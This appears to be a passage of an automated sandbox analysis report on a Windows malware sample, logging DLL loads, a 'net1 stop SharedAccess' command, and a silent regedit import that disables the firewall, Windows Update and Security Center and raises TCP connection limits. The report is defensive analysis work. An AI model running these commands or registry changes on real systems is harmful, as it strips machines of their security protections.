MD5 hash:	FD3DA8425624B98903407DF608CF2C11

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
\KnownDlls\MPR.dll	write and read and execute	image	71B20000	73728	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1020000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	8B0000	57344	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	8C0000	126976	own pid	execute	success or wait	1	1001D71
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	1001D71
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	8C0000	1208320	own pid	readonly	success or wait	1	1001D71
C:\WINDOWS\system32\net1.exe	write and read and execute	commit	9F0000	126976	own pid	execute	success or wait	2	1001D71
C:\WINDOWS\system32\net1.exe	query and read	commit	9F0000	126976	own pid	readonly	success or wait	2	1001D71

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
592	C:\WINDOWS\system32\net1.exe	net1 stop SharedAccess	suspended	success or wait	1	1001D71

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1610467277
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1610484468
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1610492999
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1610493939
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1610494390
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1610498842
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1610504984
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1610507436
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1610510557
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1610542202
Section loaded	Path: \KnownDlls\MPR.dll Access: write and read and execute Type: image Baseaddress: 71B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1610548804
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1610561399
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1610562568
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1610570102
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1610580259
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1610588177
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1610599040
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1610604242
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1610608123
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1610611764
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1610617221
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1610622596
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1610640369
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1610649781
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1610672368
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1610885143
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1611010650
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1611064337
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1611127971
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1611152266
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1611153918
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1020000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1612280374
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1612673965
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1612710499
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1613155829
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1613173903
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1613183207
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1613245834
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1613328068
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 8B0000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1613498000
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 8C0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1613508497
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1613520184
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1613549795
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1613593187
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1613616553
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1613632232
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1613646117
Process created	PID: 592 Path: C:\WINDOWS\system32\net1.exe Cmdline: net1 stop SharedAccess Createflags: suspended	success or wait	1613686297

Analysis File: regedit.exe PID: 1500 Parent PID: 1292

Sections

General
Start time:	07:41:17
Start date:	21/09/2011
Path:	C:\WINDOWS\regedit.exe
Commandline:	REGEDIT /S C:\WINDOWS\TEMP\7684d.reg
Imagebase:	0x1000000
File size:	146432 bytes
MD5 hash:	058710B720282CA82B909912D3EF28DB

File Activities:

File opened
File Path	Access	Options	Content overwritten	Completion	Count	Source Address
C:\WINDOWS\TEMP\7684d.reg	read attributes and synchronize and generic read	synchronous io non alert and non directory file	false	success or wait	1	100C005

File read
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\WINDOWS\Temp\7684d.reg	none	2	52 45	success or wait	1	100C056
C:\WINDOWS\Temp\7684d.reg	none	65536	52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	success or wait	1	100AB06
C:\WINDOWS\Temp\7684d.reg	none	65536	52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	end of file	3	100AB06

Other file operations
File Path	Disposition	Data	Ascii Data	Completion	Count	Source Address
C:\WINDOWS\Temp\7684d.reg	PositionInformation	Offset: 0		success or wait	1	100C092

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1C0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	230000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	280000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\comdlg32.dll	write and read and execute	image	763B0000	299008	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
C:\WINDOWS\system32\authz.dll	query and write and read and execute	image	776C0000	73728	own pid	read write	success or wait	1
C:\WINDOWS\system32\aclui.dll	query and write and read and execute	image	71550000	126976	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\ulib.dll	query and write and read and execute	image	71FA0000	282624	own pid	read write	success or wait	1
C:\WINDOWS\system32\clb.dll	query and write and read and execute	image	6F2B0000	24576	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	290000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3D0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3E0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	360000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
C:\WINDOWS\system32\shell32.dll	read	commit	1070000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\system32\aclui.dll	read	commit	3A0000	118784	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address

Registry Activities:

Key value set
Key Path	Name	Type	Data	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess	Start	Dword	2	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	EnableFirewall	Dword	0	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv	Start	Dword	4	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc	Start	Dword	4	success or wait	1	100B918
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\International	W2KLpk	Dword	0	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters	MaxFreeTcbs	Dword	2000	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters	MaxHashTableSize	Dword	2048	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters	TcpTimedWaitDelay	Dword	30	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters	MaxUserPort	Dword	63000	success or wait	1	100B918

Process Activities:

Process terminated
PID	Filepath	Completion	Count	Source Address
1500	C:\WINDOWS\regedit.exe	success or wait	1	1009C2A
1500	C:\WINDOWS\regedit.exe	success or wait	0	1009C2A

User Activities:

Window found
Window name	Class name	HWND of window	Completion	Count	Source Address
no string	RegEdit_RegEdit	0	success	1	1009AE8

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1610992779
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1C0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1611017396
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1611034360
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 230000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1611035682
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 280000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1611036171
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1611049279
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1611094200
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1611112642
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1611126228
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1611271632
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1611349565
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1611439548
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1611508157
Section loaded	Path: \KnownDlls\comdlg32.dll Access: write and read and execute Type: image Baseaddress: 763B0000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1611581135
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1611664336
Section loaded	Path: C:\WINDOWS\system32\authz.dll Access: query and write and read and execute Type: image Baseaddress: 776C0000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1611753075
Section loaded	Path: C:\WINDOWS\system32\aclui.dll Access: query and write and read and execute Type: image Baseaddress: 71550000 Size: 126976 Protection: read write Mapped to pid: own pid	success or wait	1611779963
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1611958199
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1612071196
Section loaded	Path: C:\WINDOWS\system32\ulib.dll Access: query and write and read and execute Type: image Baseaddress: 71FA0000 Size: 282624 Protection: read write Mapped to pid: own pid	success or wait	1612718579
Section loaded	Path: C:\WINDOWS\system32\clb.dll Access: query and write and read and execute Type: image Baseaddress: 6F2B0000 Size: 24576 Protection: read write Mapped to pid: own pid	success or wait	1613001275
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1613252292
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 290000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1613295254
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3D0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1613352099
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3D0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1613365037
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1613377526
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1613419152
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1613471793
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1613520458
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1613556751
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1613631682
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3E0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1613704892
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1613840910
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1613893035
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1613901188
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1614013361
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1614037732
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1614054641
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1070000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1614190848
Section loaded	Path: C:\WINDOWS\system32\aclui.dll Access: read Type: commit Baseaddress: 3A0000 Size: 118784 Protection: readonly Mapped to pid: own pid	success or wait	1614429746
Windows found	Window Name: no string Class Name: RegEdit_RegEdit HWND: 0	success	1616042015
File opened	Path: C:\WINDOWS\TEMP\7684d.reg Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1616044949
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 2 Value: 52 45	success or wait	1616049667
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\WINDOWS\Temp\7684d.reg	success or wait	1616052030
File read	Path: C:\WINDOWS\Temp\7684d.reg Offset: none Length: 65536 Value: 52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	success or wait	1616070029
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess Name: Start Type: Dword Data: 2	success or wait	1616124624
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile Name: EnableFirewall Type: Dword Data: 0	success or wait	1616134779
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv Name: Start Type: Dword Data: 4	success or wait	1616208546
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc Name: Start Type: Dword Data: 4	success or wait	1616241161
